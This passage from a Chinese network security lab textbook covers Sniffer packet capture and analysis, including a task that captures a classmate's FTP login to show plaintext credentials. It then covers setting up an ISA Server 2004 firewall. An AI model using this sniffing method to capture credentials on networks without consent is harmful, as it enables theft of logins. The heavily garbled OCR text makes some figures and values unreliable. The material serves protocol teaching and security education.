and Display 按钮 ,就 可 以 停止 抓 包 ,如 图 9.75 所 示 。 


C> Sniffer - Local, Ethernet (Line speed at 100 Mbps) - [Capture] 


Ê Ele Monitor Capture Display Tools Database Window Help 


ini xl 
lel x| 


" iE TRU 
FEE [stop and pispiay [7] &b | iz | e| € (7 2j ej e 


Stop and display capture &| pog ZI 


图 9.75 停止 抓 包 


Stop 


(8) 单 击 窗 口 左 下 角 的 Decode 选项 ,窗口 中 会 显示 所 捕获 的 数据 ,如 图 9. 76 所 示 。 


Sniffer - Local, Ethernet (Line speed at 100 Mbps) - [Snif cap: Det y 


EM Fie Montor Capture Display Tools Database Window Help 


=lol x| 
二 | 可 | xi 


[obsit] | pea 21i 
BRIE] sianemaleia z| e ol 


[10.62.1.10] [10.62.1 ih TCP 
[10.62.1.151] |[10.62.1.10] TCE 
[062110], |Ho 621.180] [FTP 


No [Status [Source Address Dest Address 

1 M [10.62.1.151] |[207.46.106.38] ET 
2 [207.46.106.38]|[10.62.1.151] |TCE 
3 [207 .46.106.38]| [10.62.1.151] P 
1 [10.62.1.151] [207.46 106 38] TCE 
5 [10.62.1.151] |[10.62.1.10] E 
6 

7 

8 


89 (correct) 


X Expert \ Decode A Matrix A Host Table A Protocol Dist. À Statistics / 


For Help, press F1 é&il s| zi 


Hd 9.76 显示 所 捕获 的 数据 
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任务 三 ”分析 捕获 的 数据 包 


在 图 9.77 中 可 以 看 到 3 个 窗口 。 窗 口 1 中 列 出 了 捕获 到 的 数据 ,选中 某 一 条 数据 后 , 窗 
口 2 和 3 中 分 别 显示 相应 的 数据 分 析 和 原始 的 数据 包 。 原 始 的 数据 是 以 十 六 进 制 编 码 显 示 。 


Sniffer - Local, Ethernet (Line speed at 100 Mbps) - [Snif1.cap: Decode, 1/65 Ethernet Fr. - [nj xj 
EE Fie Montor Capture Display Tools Database Window Help PIE: 


yu 吉本 | 两 | S| pea z| 
aal eis] hoses z e s. 


窗口 1 


[10.62 1.151] 
[10.62.1.151] 
[10.62.1.10] 


Tin £5 1 Icin 


[207 .46.106.38] 
[10.62.1.10] 
[10.62.1.151] 


Fin co 1 anl 


E] a) DLC: Ethertype-0800, size-60 bytes 
BY IP D-[207.46.106.38] S-[10.62.1.151] LEN-25 ID-16584 
TCP: D-1863 5-1029 ÀCK-1907456221 SEQ-1561326527 LEN-5 VIN-64270 
DLC Frame padding» 1 bytes 
一 全 窗口 2 


J0000000: 00 08 e3 35 95 ff 00 10 b5 4d 71 ef 08 00 4 E E 
jJ0000010: 00 2d 40 c8 40 00 80 06 74 d9 Oa 3e 01 97 c > d 
J0000020: 65 26 04 05 07 47 5d 0f f3 bf 71 bl 78 dd cft 


30000030: fb üe 87 89 00 00 50 4e 47 0d Oa 00 


窗口 3 


Expert À Decode A Matrix A Host Table À Protocol Dist. 六 Statistics 


‘or Help, press F1 l x 2 | 
图 9.77 分 析 捕 获 的 数据 包 


(1) 窗口 2 中 显示 出 数据 的 封包 情况 。 


DLC 首部 IP TCP DLC 尾部 


TCP 数据 在 IP 数据 报 中 的 封装 : 


一 IP 数 据 报 一 | 
m TCP 数 据 报 -| 


IP 首 部 TCP 首 部 TCP 数 据 
20 字 节 20 字 节 

(2) 单 击 窗口 2 中 的 某 一 条 ,可 以 在 窗口 3 中 看 到 相应 的 原始 数据 的 背景 成 灰色 ,表明 
这 些 数据 与 之 对 应 。 

单 击 窗口 2 中 IP 左边 的 十 号 ,可 以 看 到 数据 包 的 具体 解释 ,如 图 9.78 所 示 。 


Sniffer - Local, Ethernet (Line speed at 100 Mbps) - [Snif .cap: Decode 1/65 Ethernet Eremes ePi» E 


FM fie Montor Capture Display Too Database Window Help PITE 
| oo nme inl x [oes — 1| 
E EE ELLE ELI i 


P: Type of service = 
000 


protocol vill ignore the 


P. Total length 
Identification = 

P: Flags E 

H = don't fragment 


00000000: 00 08 e3 35 25 ff 00 10 bS 4d 71 ef 08 00 


00000010: 00 2d 40 c8 40 00 80 06 74 d9 0a 3e 01 97 cf 2e -€ 
00000020: 6a 26 04 05 07 47 Sd 0f £3 bt 71 bl 78 dd 50 18 j& 
00 00 50 4e 47 Od Oa 00 908 


00000030: fb 0s 87 PNG... 
NExpert À Decode f Matrix Y Host Table J Protocol Dist. A Statistics 7 
Zi T á 


For Help, press FL & | 


图 9.78 数据 包 的 解释 


图 9.78 中 ,在 窗口 1 中 选中 第 一 个 数据 包 ,窗口 2 中 会 展开 该 数据 包 中 的 IP 数据 部 
分 ,选中 的 部 分 以 蓝 色 背 景 显示 ,相应 的 在 窗口 3 中 “45” 以 灰色 背景 显示 ,这 表明 TP 数据 包 
中 表示 IP Version 和 Header Length 的 部 分 在 原始 数据 中 用 十 六 进 制 编码 的 “45” 表 示 。 

同 理 , 在 窗口 2 中 选中 一 项 ,在 窗口 3 中 都 会 有 相应 的 数据 与 之 对 应 。 仔 细 观 察 ,会 
现 每 一 字段 都 与 下 图 中 的 IPv4 包头 结构 一 致 ,如 图 9.79 所 示 。 


0 15 16 31 
4 位 “|4 位 首部 | 8 位 服务 类 型 TUE 
版 本 长 度 (TOS) 16 位 总 长 度 ( 字 节 数 ) 
16 位 标识 13 位 片 偏 移 
rm 8 位 协议 16 位 首部 检验 和 2037 
32 位 源 IP 地 址 
32 位 目的 JP 地址 
选项 (如 果 有 ) ! 
数据 1 
1 1 


图 9.79 IPv4 包头 结构 


(3) 在 窗口 2 中 展开 TCP 的 首部 ,窗口 3 中 会 加 亮 显示 相应 的 数据 ,图 9. 80 所 示 。 
仔细 与 图 9. 81 中 的 TCP 包头 结构 比较 ,会 发 现 它们 也 是 一 一 对 应 的 。 
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Sniffer - Local, Ethernet (Line speed at 100 Mbps) - [Snifl.cap: Decode, 1/65 ECE pole [= f] 


FH Fie Montor Capture Display Tools Database Window Help PUE 


| eure if | [oon — 1 
Eo a E 


-[207.46.106.38] S-[10.62.1.151] LEN-25 ID-16584 
— TCP header ——— 


N Expert À Decode / Matrix À, Host Table J) Protocol Dist. 人 Statistics 7 
For Help, press F1 == 4 


图 9.80 相应 数据 的 显示 


0 15 16 5i 
16 位 源 端口 号 16 位 目的 端口 号 
32 位 序号 
32 位 确认 序号 20 字 节 
4 位 数据 保留 UTATPTRISTE MEE 
WE | 6i RRNA 16 位 窗口 大 4 
didis 16 位 紧急 指针 
选项 1 
! 数据 | 
| D 


图 9.81 TCP 包头 结构 


(4) Xf ICMP 数据 包 的 捕获 。 同 对 TCP 和 IP 数据 包 捕 获 的 过 程 类 似 , 一 点 区 别 是 在 
Capture 菜单 中 选择 Define Filter, 然 后 在 Advance 选项 中 选中 IP 中 的 ICMP. 

(5) 此 时 ,可 以 选中 一 台 机 器 ,开始 对 其 抓 包 ,可 以 抓 自 己 的 数据 包 。 开 始 抓 包 后 ,被 抓 
包 的 机 器 进入 DOS 界面 ,使 用 ping 命令 ping 网 络 中 的 任意 一 台 主 机 。 完 成 后 ,停止 抓 包 。 
这 时 , 回 到 decode 界面 ,可 以 看 到 刚才 使 用 ping 命令 中 的 ICMP 数据 包 。 从 图 9. 82 中 可 
以 看 到 捕获 了 Echo 和 Echo Reply 数据 包 。 


EN pie Monitor pture Display Tool Database Window Help 
a|] S| Der = 
a| &|gau|zz| e| R8: 


[Staus] Source Address 
M |[10.62.1.151] 
[10.62.1.1] 


00000000. 00 08 = ff 00 10 bS 4d 71 ef 08 00 77. Miq? 
00000010 i 
00000020 08 00 46 5c 02 00 05 00 61 62 63 64 65 66 F5. , . .abccef 
00000030: 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 ghijklanoparstuv 
00000040: 77 61 62 63 64 65 66 67 68 69 wabcdefghi 
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For Help, press Fi é& 也 2z 


[d 9.82 捕获 了 Echo 和 Echo Reply 数据 包 


任务 四 捕获 含有 用 户 名 及 密码 的 数据 包 


(1) 选中 Monitor 菜单 
图 9. 83 所 示 。 


Sniffer Portable - Local, Ethernet (Line speed at 10 Mbps). 
fJ Ee Montor Capture Display Tools Database Widow Help 
Dashboard 
Host [able 
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History Samples 

Protocol Distribution 
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Traffic Map. 


01005000118 
Sych 


Define Fiter... 
Select Fiter... 
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E] 9.83 网 络 中 的 Traffic Map 视图 


下 的 Matrix. 此 时 可 以 看 到 网 络 中 的 Traffic 


Map 视图 ,如 


dh «o à 
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(2) 在 左下 角 可 以 通过 单 击 MAC,IP z& IPX 使 Traffic Map 视图 显示 相应 主机 的 
MAC.IP 或 IPX 地 址 。 图 9. 84 中 显示 的 是 网 络 中 主机 的 IP 地 址 ,每 条 连 线 表 明 两 台 主 机 
间 的 通信 。 客 户 机 IP 地 址 为 : 192. 168.0. 58、192. 168. 0. 86,192. 168. 0. 132, 


..-inl xi 
1 Montor Capture Display Tools Database Window Help PIE 
ions a ssa — — 可 

[e| alaj a| ea z| e| «| 


Traffic Map. 


For Help, press F1 & 2A 2 
图 9.84 客户 机 IP 地 址 
(3) 在 Capture 菜单 中 选中 Define Filter 选项 ,如 图 9. 85 所 示 


ri ini xi 
ure Displsy Jools Database Window Help »A81 xl 


xu] 


Traffic Map 


Trigger Setup. 


Define fiter 号 " Az 


图 9.85 选中 Define Filter 


(4) 弹出 Define Filter 选项 框 后 ,在 Advanced 选项 中 ,展开 IP, 选 中 TCP 中 的 FTP 3€ 
项 ,从 而 定义 了 要 捕获 的 数据 包 类 型 ,如 图 9. 86 所 示 


Define Filter - Capture Al xl 


Sanmary | Address | Data Pattern eed Buffer | Settings For 
T- 33] IT-wmEs EI n 
T: 8 ISo-TP4 
T3 ospr 
日 -人 多 rcr 
[MEy DNS (TCP) E 
K is FTP 
p GOPHER 
Packet Type 
Vüversize n 


VCollision — | 
Ml sizes Vligwent F 


取消 | Profiles 


图 9.86 选中 TCP 中 的 FTP 选项 


(5) 回 到 Traffic Map 视图 中 ,用 鼠标 选中 要 捕获 的 主机 的 IP 地 址 。 选 中 后 ,主机 地 址 
会 以 白 底 高 亮 显 示 。 此 时 , 单 击 鼠 标 右键 ,选中 Capture, Sniffer 则 开始 捕获 指定 IP. 地 址 
的 主机 的 数据 包 。 例 如 : 用 IP 地 址 为 192. 168. 0. 86 的 客户 机 登录 本 机 的 FTP 站 点 来 捕 
获 数据 包 , 也 可 以 捕获 自己 的 数据 包 , 也 可 以 两 人 配合 。 同 学 甲 负责 捕获 同学 乙 的 数据 包 ， 
开始 抓 包 时 ,同学 乙 登 录 有 FTP 服务 的 服务 器 。 同 学 甲 的 IP 为 192. 168. 0. 34, 同 学 乙 的 
为 192. 168. 0. 86 ,如 图 9. 87 所 示 


Sniffer Portable - Local, Ethernet (Line speed at 10 Mbps) = ZI lini xj 
V Ee Montor Capture Display Tools Databese Window help =l xj 
MEESI z 


Bls [Xl:=l= lN CEBO |w. |. 


Capture packet using selected address pair 


图 9.87 IP 地 址 


(6) 开始 捕获 后 ,通过 单 击 工具 栏 中 的 Capture Panel, 看 到 捉 包 的 情况 ,图 中 显示 出 
packet 的 数量 ,如 图 9. 88 所 示 。 
(7) 实验 者 本 人 或 同学 乙 开 始 登录 FTP 站 点 , 右 击 选择 “登录 ”选项 ,如 图 9. 89 所 示 。 
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— Sniffer - Local, Ethernet (Line speed at 100 Mbps) - [Capture] ini xi 
Ê Ele Monitor Capture Display Tools Database Window Help -ls| x| 


[us| x] ool 
elal slal esce les ile e| el el 


[Capture Panel zi 


zi 
Show capture panel &ll ai fip o [x 
图 9.88 提包 的 情况 
P3 np://192.162.0:4/ - Microsoft Internet Explorer lg 对 
KO HEV wm) IAD 
-+ - UL ARF LXR dee | 3 
p92.168 9-4) -Ona | 


[3 
M r1 Li 
192.168.0.34 
服务 器 192.168.0.34 
RIP: Anonymous 


音 击 此 处 了 解 世 他 关于 浏览 FTP 
HADAD. 


使 用 其 他 用 户 各 和 密码 登录 。 


图 9.89 选择 登录 


(8) 弹出 “登录 ”对 话 框 后 ,输入 用 户 名 和 密码 ,如 图 9. 90 所 示 。 
xi 
qe SREPEREIBURERSE rr 服务 器 。 


HP 服务 器 : 192. 168. 0. 34 

mezv: BE 可 
zB: = 
登录 后 ， 将 其 添加 到 | 您 的 收 若 夹 列表 中 就 可 以 方便 地 
返回 该 FIP 服务 器 。 

T 匿名 登录 @&) T sees 


[xso ] ww | 


Wd 9.90 输入 用 户 名 和 密码 


(9) 此 时 ,从 Capture Panel 中 看 到 捕获 的 数据 包 已 达到 一 定数 量 , 单 击 Stop and 
Display 按钮 ,停止 抓 包 ,如 图 9. 91 和 图 9. 92 所 示 。 
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^? Elle Monitor | Capture Display Tools Database Window Help 二 | 可 | x| 
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Stop F10 


Sij 号 Stop and Display F9 
ideed 


Trigger Setup... 


Show capture panel & po pz 21 


[8 9.91. Miil; Capture Panel 选项 


niffer - Local, Ethernet (Line speed at 100 Mbps] 
Ê. Ele Monitor Capture Display Tools Database Window Help EIE: 


;| u| || 六 | es 可 
[El Sl sca oss p| [ea] || | &| 可 | 


Gauge Detail 


Stop and display capture [=] Lk 13 


图 9.92 停止 抓 包 


(10) 停止 抓 包 后 , 单 击 窗口 左下 角 的 Decode 选项 ,窗口 中 会 显示 所 捕获 的 数据 ,如 
图 9.93 所 示 。 
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图 9.93 显示 所 捕获 的 数据 


任务 五 ”分析 捕 获 的 数据 包 


CD 在 图 9.94 中 ,可 以 看 到 该 窗口 由 三 大 块 组 成 ,窗口 (上 ) 列 出 了 捕获 到 的 数据 ,选中 
某 一 条 数据 后 ,窗口 (中 ) 和 (下 ) 分 别 显示 相应 的 数据 分 析 和 原始 的 数据 包 。 原 始 的 数据 是 
以 十 六 进 制 编码 显示 。 


Sniffer Portable - Local, Ethernet (Line speed at 10 Mbps) - [Snif2: Decode, 1/41 Unknown Is E] 
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9.94 原始 的 数据 是 以 十 六 进 制 编码 显示 


(2) 在 捕获 的 数据 包 中 ,捕获 的 数据 包 上 、 中 .下 窗口 分 别 显 示 了 TCP 连接 过 程 中 的 
在 窗口 (上 ) 中 可 以 从 SYN 标志 快速 找到 建立 一 个 TCP 连接 的 数据 。 在 窗口 (上 ) 


次 握 


中 看 出 数据 包 1 是 TCP 连接 ,D=21 S—4612 表明 目的 端口 是 21, 主 机 端口 是 4612。 窗 口 
(中 ) 显 示 主 机 向 服务 器 发 出 了 FTP 连接 的 请 求 。 数 据 中 包含 SYN、 用 于 连接 的 端口 号 、 序 


列 号 字 


段 中 的 初始 序列 号 和 SN, 如 图 9. 95 所 示 。 


Sniffer Portable - Local, Ethernet (Line speed at 10 Mbps) - [Snif2: Decode, 1/41 Unknown loj xj 
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E n| aftalt) | ern z| 


ntering Passive 
ttian net htm 
ttian. net .htm 


4612 
= 21 (FTP-ctrl) 四 


Data offset 


图 9.95 TCP 连接 过 程 中 的 三 次 握手 


(3) 在 窗口 (上 ) 中 选中 数据 包 2。 这 是 服务 器 向 主机 发 送 的 数据 。 数 据 中 对 刚才 主机 
发 送 ACK 包 进 行 了 确认 。 此 时 ,TCP 连接 中 已 经 完成 了 两 次 握手 ,如 图 9. 96 所 示 。 


( 
包 中 ， 
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9.96 TCP 连接 中 已 经 完成 了 两 次 握手 


D 选中 窗口 (上 ) 中 的 数据 包 3。 它 显示 了 第 三 次 握手 ,从 而 完成 了 TCP 连接 。 在 此 : 


机 对 服务 器 发 出 的 数据 包 进 行 了 确认 (ACK 一 370003266) ,这 表明 整个 建立 过 程 中 “| 章 


实验 
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没有 数据 包 丢 失 ,连接 成 功 , 如 图 9.97 所 示 。 
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图 9.97 连接 成 功 


C 捕获 的 数据 包 19、20、21、22 显示 了 结束 一 个 TCP 连接 的 四 个 基本 步骤 。 在 窗口 
(上 ) 中 可 以 通过 FIN 标志 快速 找到 结束 一 个 TCP 连接 的 数据 ,如 图 9. 98 所 示 。 
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图 9. 98 ”结束 一 个 TCP 连接 的 数据 


(6) 数据 包 19 显示 出 主机 向 服务 器 发 出 请 求 结束 TCP 连接 ,数据 包 20 和 21 显示 服 
务 器 向 申请 的 主机 发 送 了 2 个 数据 包 , 分 别 是 确认 数据 包 和 自己 的 FIN。 数据 包 22 是 主机 
发 送 自 己 的 FIN, 从 而 结束 了 TCP 连接 。 分 析 这 4 个 包 时 可 以 结合 图 9. 99 理解 。 


FIN 标 识 ， 停 止 服务 器 端 到 客户 端 
的 数据 传输 
确认 信息 (ACK) 
FINER. BEAP AIRA A 
的 数据 传输 


客户 端 /请 求 端 确认 信息 (ACK) 


图 9. 99 请 求 结束 TCP 连接 


(7) FTP 中 的 数据 是 以 明文 形式 传输 的 。 在 捕获 的 数据 包 中 可 以 找到 刚才 登录 的 用 户 
名 和 密码 。FTP 的 数据 是 以 粉红 色 的 颜色 显示 。 如 : 数据 包 5 显示 用 户 以 fish 用 户 名 登 
K ,在 数据 包 7 中 PASS fish 表明 用 户 密码 是 fish, 如 图 9. 100 所 示 。 
[ Sniffer Portable Local Ethernet (Lime speed at 10 Mbps) [Sil2:Derode s/t unkno I E: 
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图 9.100 FTP 中 的 明文 


实验 总 结 : 
通过 做 此 实验 ,可 以 加 深 对 TCP 连接 和 结束 TCP 过 程 的 理解 ; 并 且 理 解 了 FTP 协议 
的 明文 传输 特性 。 


EA ISA 防火 墙 应 用 


ISA Server 2004 是 目前 世界 上 最 好 的 路 由 级 软件 防火 墙 , 它 可 以 在 企业 内 部 网 络 安 
全 、 快 速 地 连接 到 Internet, 性 能 可 以 和 硬件 防火 墙 媲美 ,并 且 其 深层 次 的 应 用 层 识 别 功能 
是 目前 很 多 基于 包 过 滤 的 硬件 防火 墙 都 不 具备 的 。 可 以 在 网 络 的 任何 地 方 , 如 两 个 或 多 个 
网 络 的 边缘 层 (LAN 到 Internet, LAN $] LAN,LAN 到 DMZ、LAN 到 VPN 等 ) 单个 主机 
上 配置 ISA Server 2004 来 对 网 络 或 主机 进行 防护 。 


How 


网 络 安 全 与 信息 保障 


一 、 安 装 ISA Server 2004 
图 9. 101 所 示 为 网 络 拓扑 结构 。 


IP: Public 
IP: 10.0.1.1/24 IP: 192.168.1.49/24 cDG:ISPRouter |, 
DG: None DG: 192.168.1.60 DNS:None 
DNS: 10.0.1.1 DNS: None 
SecureNAT dient DSL Router 
IP: 10.0.1224 ISA Server 2004 Firewall — IP: 192.168.1.60/24 
DG: 10.0.1.1 DG: None 
DNS: 10.1.1 DNS: None 


图 9.101 网 络 拓 朴 结构 


(1) 在 ISA Server 2004 服务 器 上 已 经 建立 好 了 一 个 内 部 的 DNS 服务 器 ,所 有 客户 端 
以 ISA Server 机 的 内 部 接口 (10. 0. 1. 1) 作 为 它 的 网 关 和 DNS 服务 器 。 安 装 的 版 本 是 ISA 
Server 2004 中 文 标 准 版 (Build 4. 0. 2161. 50)。 运 行 ISA Server 2004 的 安装 程序 ISA 
Autorun. exe, 开 始 ISA Server 2004 的 安装 ,如 图 9. 102 所 示 。 


ft ISA Server 2004 安装 程序 ioj] 

Microsoft 
A! Windows Server System | 
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Microsoft" E 
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阅读 入 门 向 导 运行 迁移 向 导 

网 读 迁 称 向 导 退出 


(C) 2004 Microsoft Corporation. All rights reserved — Microsoft 


图 9.102 ”开始 ISA Server 2004 的 安装 


(2) 选择 “安装 ISA Server 2004” 选 项 ,出 现 安装 界面 如 图 9. 103 所 示 。 
G) 单 击 “ 下 一 步 ” 按 钮 ,在 “许可 协议 ”对 话 框 中 ,选择 “我 接受 许可 协议 中 的 条 款 ” 选 
项 , 单 击 “ 下 一 步 "按钮 。 


欢迎 使 用 Microsoft ISA Server 2004 的 安装 
BÜREM ^ eor [s 


初始 化 系统 安装 向 导 获 许 您 更 改 ， 修 复 或 册 除 Microsoft ISA 
Server 2004. 


要 继续 ， 请 单 击 “ 下 一 步 "。 


图 9. 103 安装 界面 


CD 在 "客户 信息 "对话 框 中 ,输入 个 人 信息 和 产品 序列 号 , 单 击 “ 下 一 步 ? 按 钮 。 
G) 在 “安装 类 型 ”对话 框 中 ,如 果 想 改变 ISA Server 2004 的 默认 安装 选项 ,可 以 单 击 
“ 自 定 义 ” 单 选 按钮 ,然后 单 击 * 下 一 步 ?按钮 ,如 图 9. 104 所 示 。 


[È Microsoft ISA Server 2004 — SEAS x 


EPERFA. 需要 大 约 27m 磁盘 空间 (不 包括 组 


安装 所 有 程序 功能 。 (需要 最 多 的 辜 盘 空间 ， 

13 - e» 
"e, 建议 丙 级 用 户 使 用 
E 


roman FilesWWicrosoft ISA 5: 38900... 
o» | 
图 9. 104 “安装 类 型 "对 话 框 


(6) 在 “ 自 定义 安装 ”对 话 框 中 可 以 选择 安装 组 件 , 默 认 情 况 下 .会 安装 防火 墙 服务 器 、 
ISA 服务 器 管理 ,防火 墙 客户 端 安装 共享 和 用 于 控制 垃圾 邮件 和 邮件 附件 的 消息 筛选 程序 
不 会 安装 ,如 图 9. 105 所 示 。 如 果 想 安装 消息 筛选 程序 ,需要 先 在 ISA Server 2004 服务 器 
上 安装 IIS 6.0 SMTP 服务 。 

(7) 单 击 “ 下 一 步 ” 按 钮 继续 ,打开 “内 部 网 络 " 窗 口 , 如 图 9. 106 所 示 。 

(8) 在 “内 部 网 络 ”" 窗 口 , 单 击 “ 添 加 ”按钮 。 在 ISA Server 2004 中 ,内 部 网 络 定义 为 
ISA Server 2004 必须 进行 数据 通信 的 信任 的 网 络 。 防 火 墙 的 系统 策略 会 自动 允许 ISA 
Server 2004 到 内 部 网 络 的 部 分 通信 ,如 图 9. 107 所 示 。 


How 


AARE NI E REE 


9.106 “内 部 网 络 "窗口 


9.107 地 址 添加 对 话 框 


(9) 在 地 址 添加 对 话 框 中 , 单 击 “ 选 择 网 卡 ” 按 钮 ,出 现 “ 选 择 网 卡 ” 对 话 框 ,如 图 9. 108 
所 示 。 


选择 同 卡 


选择 要 在 内 部 网 络 中 包含 的 IP 地 址 。 


p 添加 下 列 BE: 10.x.x.x，192. 168.x. x> 172.16.x.x — 
172.31. x. x 和 189. 254. x. x QU. 


[v 基于 Windows 路 由 表 添加 地 址 范围 E) 


选择 与 下 列 内 部 网 卡 相关 联 的 地 址 范围 GS) 
下 地址 
Td LAN. 10011 
O wan 192.168.1.49 
Do. 1721701 
—»- | —s» | 


图 9.108 “PERIE "x iE 


(10) 在 “选择 网 卡 ” 对 话 框 中 ,取消 选中 “添加 下 列 专用 范围 ” 复 选 项 ,保留 “基于 


Windows 路 由 表 添 加 地 址 范围 " 复 选 项 。 选 中 连接 内 部 网 络 的 适配器 , 单 击 “ 确 定 ” 按 钮 。 在 弹 
出 的 提示 对 话 框 中 单 击 “确定 ”按钮 ; 在 “内 部 网 络 " 窗 口中 单 击 “ 确 定 ” 按 钮 ,如 图 9. 109 所 示 。 
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图 9.109 添加 内 部 网 络 地 址 范围 


QD 在 “内 部 网 络 ?窗口 单 击 “下 一 步 ? 按 钮 ,如 图 9. 110 所 示 。 

(12) 打开 “防火墙 客 户 端 连接 设置 ?对 话 框 , 如 图 9. 111 所 示 。 如 果 客 户 机 上 使 用 了 
ISA Server 2000 的 防火 墙 客户 端 , 则 可 以 勾 选 “允许 运行 早期 版 本 的 防火 墙 客户 端 软件 的 
计算 机 连接 ?选项 , 单 击 * 下 一 步 "按钮 。 

(3) 在 如 图 9. 112 所 示 的 “服务 ”对 话 框 中 , 单 击 “ 下 一 步 ” 按 钮 。 

(14) 在 “可 以 安装 程序 了 ”对 话 框 中 单 击 “ 安 装 ” 按 钮 ,如 图 9. 113 所 示 。 

在 安装 向 导 完 成 页 ,选择 “在 向 导 关 闭 时 运行 ISA 服务 器 管理 ”, 然 后 单 和 
时 ,会 出 现 Microsoft Internet Security and Acceleration Server 2004 控制 台 。 


lis. 此 
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9.112 “服务 "对话 框 
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可 以 安装 程序 了 
向 导 已 就 绪 ,可 以 开始 安装 了 。 


要 开始 安装 ， 请 单 击 “ 安 装 ”。 
IRE RINOESL EDISON » 请 单 击 “ 上 一 步 ”。 要 退出 向 导 ， 请 单 击 “ 职 
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图 9.113 “可 以 安装 程序 了 ”对 话 框 


二 、 配 置 ISA Server 2004 服务 器 


在 ISA Server 2004 中 ,防火 墙 策 略 是 由 网 络 规则 、 访 问 规则 和 服务 器 发 布 规则 三 者 的 
结合 。 网 络 规则 定义 了 不 同 网 络 间 如 何 访问 ,而 访问 规则 定义 了 用 户 ( 内 、 外 网 ) 的 访问 , 服 
务 器 发 布 规则 定义 了 如 何 让 用 户 访问 服务 器 。 

1. 网 络 规则 

网 络 规则 定义 并 描述 网 络 拓扑 。 网 络 规则 确定 两 个 网 络 之 间 是 否 存 在 连接 ,以 及 定义 
如 何 进 行 连接 。 网 络 连接 的 方式 如 下 。 

OD 网 络 地 址 转换 (NAT)， 当 指 定 这 种 类 型 的 连接 时 ,ISA 服务 器 将 用 它 自己 的 IP 
地 址 替换 源 网 络 中 的 客户 端的 IP 地 址 。 当 定义 内 部 网 络 与 外 部 网 络 之 间 的 关系 时 ,可 以 
使 用 NAT 网 络 规则 。 

(2) 路 由 : 当 指定 这 种 类 型 的 连接 时 ,来 自 源 网 络 的 客户 端 请 求 将 被 直接 转发 到 目标 
网 络 。 源 客户 端 地 址 包含 在 请 求 中 。 当 发 布 位 于 DMZ 网 络 中 的 服务 器 时 ,可 以 使 用 路 由 
网 络 规则 。 

路 由 网 络 关系 是 双向 的 。 如 果 定 义 了 从 网 络 A 到 网 络 B 的 路 由 关系 ,那么 从 网 络 B 
到 网 络 A 也 存在 着 路 由 关系 。 相 反 ,NAT 关系 则 是 唯一 的 和 单 向 的 。 如 果 定 义 了 从 网 络 
A 到 网 络 B 的 NAT 关系 , 则 不 能 定义 从 B 到 A 的 网 络 关系 。 可 以 创建 定义 双向 关系 的 
网 络 规 则 ,但 是 ISA 服务 器 将 忽略 有 序 规则 列表 中 的 第 二 条 网 络 规则 。 

在 安装 时 ,会 创建 下 列 默认 规则 ,如 图 9. 114 所 示 。 
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图 9.114. 默认 规则 
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本 地 主机 访问 。 此 规则 定义 了 在 本 地 主机 网 络 与 其 他 所 有 网 络 之 间 存 在 的 路 由 关系 。 

VPN 客户 端 到 内 部 网 络 。 此 规则 指定 在 两 个 VPN 客户 端 网 络 (“VPN 客户 端 " 和 “被 
隔离 的 VPN 客户 端 ”) 与 内 部 网 络 之 间 存 在 着 路 由 关系 。 

Internet 访问 。 此 规则 定义 了 在 内 部 网 络 与 外 部 网 络 之 间 存 在 的 NAT 关系。 

2. 访问 规则 

(1) 防火 墙 系统 策略 

在 安装 ISA Server 2004 服务 器 时 ,会 创建 默认 的 系统 策略 。 系 统 策略 允许 ISA 
Server 2004 服务 器 访问 它 连 接 到 的 网 络 的 特定 服务 。 在 防火 墙 策略 上 右 击 ,指向 “查看 ”， 
然后 选择 “显示 系统 策略 规则 ”选项 ,如 图 9. 115 所 示 , 或 者 单 击 图 标 栏 上 最 右边 的 快捷 图 
标 , 如 图 9.116 所 示 。 


S] Microsoft Internet Security and 
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图 9.115 创建 默认 的 系统 策略 图 9.116 单 击 图 标 栏 上 最 右边 的 快捷 图 标 


右边 出 现 了 系统 策略 ,如 图 9. 117 所 示 ,标注 的 地 方 表明 ,IJISA Sevrer 2004 服务 器 可 以 
向 任何 网 络 发 起 DNS 请 求 。 


Ls tAMOER... tir Hl dt.. EEL. 二 本 地 主机 MAAF 
aa 允许 使 用 Ne. Qut i 会 话 如 本 地 主机 nS 名 所 有 F 
diras - 
&[rs fA Isa Qi Dras 二 本 地 主机 SAS mar 
[nro dee 
日 国 6 tA Isa... Qrif Dikebers-.. 二 本 地 主机 AS 名所 有 
D terberoc- 
[Ev stem nm... Gi Dn FETTTENEY LL ONEYZ 
[s tA 15A... Qir Dine GR) 二 本 地 主机 专任 何 地 点 RAAF 
Le tA me... Qir Diner ($0 过 内 部 二 本 地 主机 — 名所 有 F 
国 10 furAPüE;t.. Giir Biring JA 远程 管理 AFHI PSOE 
Sn Asa... Quutit Blio RUBER 三 本 地 主机 AMARA.. PAA 
Dirar [ 


图 9.117 系统 策略 


(2) 访问 策略 

建立 一 条 访问 策略 以 允许 内 部 网 络 客户 访问 外 部 网 络 (Internet) ,同时 ,内 部 网 络 客户 
需要 访问 ISA Server 2004 服务 器 上 的 DNS 服务 器 以 解析 域名 ,需要 建立 一 条 策略 以 允许 
内 部 网 络 客户 访问 ISA Server 2004 服务 器 的 DNS 服务 。 


CD 新 建 一 条 允许 内 部 客户 访问 外 部 网 络 的 所 有 服务 的 访问 规则 : 
在 防火 墙 策略 上 右 击 ,指向 “新 建 ”, 然 后 选择 “访问 规则 ?选项 ,如 图 9. 118 Bron. 


ES] Microsoft Internet Security and 


图 9.118 访问 规则 


在 “新 建 访问 规则 向 导 ” 的 访问 规则 名 称 文本 框 中 ,输入 Allow all outbound traffic, 然 
后 单 击 “ 下 一 步 ” 按 钮 。 然 后 在 “规则 操作 ”对 话 框 中 选择 “允许 ” 单 选 按 钮 , 单 击 “ 下 一 步 ” 按 
钮 ,如 图 9.119 所 示 。 
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ARIETE 


OPER RSSEESDR ANNUM » 用 于 处 理 客户 端 从 指定 目标 请 求 内 容 的 


《上 一 步 加 取消 


图 9. 119 “规则 操作 ”对 话 框 


在 “协议 "对话 框 中 选择 “所 有 出 站 通讯 ”选项 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 9. 120 所 示 。 
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请 选择 此 规则 要 应 用 到 的 协议 。 


此 规则 应 用 到 T: 


《上 一 步 @) 取消 


图 9. 120 “协议 ”对 话 框 
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在 “访问 规则 源 ” 对 话 框 中 , 单 击 “ 添 加 ”按钮 ,打开 “添加 网 络 实体 ”对 话 框 ,双击 “内 部 ”， 
然后 单 击 “ 关 闭 ” 按 钮 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 9. 121 Bro. 


新 建 访 问 规则 符 导 
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图 9.121 添加 内 部 网 络 实体 


